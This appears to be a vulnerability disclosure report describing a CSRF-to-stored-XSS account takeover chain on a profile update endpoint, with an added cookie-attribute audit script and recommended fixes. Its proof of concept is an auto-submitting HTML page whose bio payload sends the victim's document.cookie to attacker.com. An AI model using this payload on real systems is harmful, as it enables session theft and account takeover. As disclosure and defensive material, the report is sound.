HIGH (8.8)
Account Takeover via CSRF chained with Self-XSS on Profile Update
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1. Description
I have identified a vulnerability chain that allows an attacker to take over the account of any logged-in user who visits an attacker-controlled page.
The core issue is that the /api/update_profile endpoint lacks CSRF protection. The Bio field is also stored and rendered without encoding, but because the payload only renders on the owner's own profile page this would normally be written off as Self-XSS. By using the CSRF to write the payload into the victim's own profile, I turn that Self-XSS into stored XSS executing in the victim's session, and from there into full Account Takeover.
2. Technical Details
Vulnerable Request (CSRF):
The following POST request updates the user's profile without validating a CSRF token or the Origin/Referer headers (the PoC below is submitted from attacker.com and is still accepted):
POST /api/update_profile HTTP/2
Host: profile.megacorp.com
Cookie: session=victim_session_id
Content-Type: application/x-www-form-urlencoded

fullname=Victim&bio=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&csrf_token=
Vulnerability Analysis:
- No CSRF Token: The server accepts the request even if the csrf_token parameter is empty or missing.
- No Sanitization: The bio parameter accepts raw HTML/JavaScript tags, and the value is rendered on the profile page without output encoding.
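Two cookie properties decide whether this chain is live: the session cookie must be sent on a cross-site form POST (no SameSite=Lax/Strict), and, for the cookie-stealing payload used below, it must be readable from JavaScript (no HttpOnly). The report does not include the login response, so the following is an added example (not part of the report or the target application) that audits a constructed Set-Cookie value for exactly those properties; the header text is an assumption.

```javascript
// Added example (not from the original report or the target application):
// audit the session cookie attributes this CSRF -> self-XSS chain relies on.
// The report never shows the login response, so this Set-Cookie value is a
// constructed sample, not captured traffic.
const SAMPLE_SET_COOKIE = 'session=victim_session_id; Path=/; Secure';

// Parse one Set-Cookie header value into { name, value, attrs } with
// attribute names lower-cased and flag attributes stored as true.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const attrs = {};
  for (const part of rest) {
    if (!part) continue;
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1).trim();
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs };
}

// Findings for the two links in the chain:
//  - crossSitePostSendsCookie: the cross-site form POST from section 3 will
//    carry the cookie. True when SameSite is None or absent (browsers that
//    default to Lax still send a cookie without SameSite on a top-level POST
//    for two minutes after it was set, so "absent" is treated as exploitable).
//    With SameSite=Lax or Strict the request in section 2 arrives without a
//    session and the chain breaks at step 1.
//  - readableByScript: document.cookie exposes it (no HttpOnly), which the
//    cookie-stealing payload in section 3 needs.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const sameSite = String(c.attrs.samesite || '').toLowerCase();
  return {
    name: c.name,
    crossSitePostSendsCookie: sameSite === '' || sameSite === 'none',
    readableByScript: c.attrs.httponly !== true,
    sentOverPlaintext: c.attrs.secure !== true,
  };
}
```

Run it against the real Set-Cookie from the login response; if crossSitePostSendsCookie comes back false the CSRF step alone is blocked, and if readableByScript is false the payload must act through the application's APIs instead of exfiltrating document.cookie.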
3. Proof of Concept (Exploit)
To reproduce this vulnerability, an attacker hosts the following HTML file and sends the link to a logged-in victim.
<!-- exploit.html -->
<html>
<body>
<h1>Please wait...</h1>
<form action="https://profile.megacorp.com/api/update_profile" method="POST">
<input type="hidden" name="fullname" value="Hacked Account">
<!-- Malicious Payload to Steal Cookies -->
<input type="hidden" name="bio" value="<script>fetch('https://attacker.com/log?c='+document.cookie)</script>">
<input type="submit" value="Click me">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Steps to Reproduce:
- Log in to the application as a Victim.
- Open the exploit.html file in the same browser (simulating a phishing link).
- The page will auto-submit the form to profile.megacorp.com.
- Navigate back to the Victim's profile page.
- Result: The XSS payload executes, sending the Victim's session cookie to the Attacker's server.
Note: this particular payload reads document.cookie, so it requires the session cookie to be set without the HttpOnly flag. If the cookie is HttpOnly, the injected script still runs in the Victim's session and can call the application's own endpoints on their behalf instead.
4. Impact Analysis
Business Impact:
This vulnerability leads to full Account Takeover (ATO). An attacker can compromise high-value accounts (including Admins) simply by sending a link. Once cookies are stolen, the attacker can:
- Access sensitive PII (Personally Identifiable Information).
- Perform unauthorized financial transactions.
- Delete the user's account or data.
5. Recommended Fix
We recommend a two-layered approach:
- Implement Anti-CSRF Tokens: Ensure all state-changing requests (POST/PUT/DELETE) require a valid, unpredictable token that is bound to the user's session and verified on the server; an empty or missing token must be rejected. As defense in depth, set the session cookie with SameSite=Lax (or Strict) and HttpOnly, and reject requests whose Origin header is not the application's own origin.
- Encode Output and Sanitize Input: Encode the bio field for its HTML context whenever it is rendered, since output encoding is what prevents the stored payload from executing. If rich text is genuinely required, additionally sanitize with an allowlist-based library such as DOMPurify (note that DOMPurify runs in the browser; server-side rendering needs an equivalent server-side sanitizer).
Report generated for educational purposes.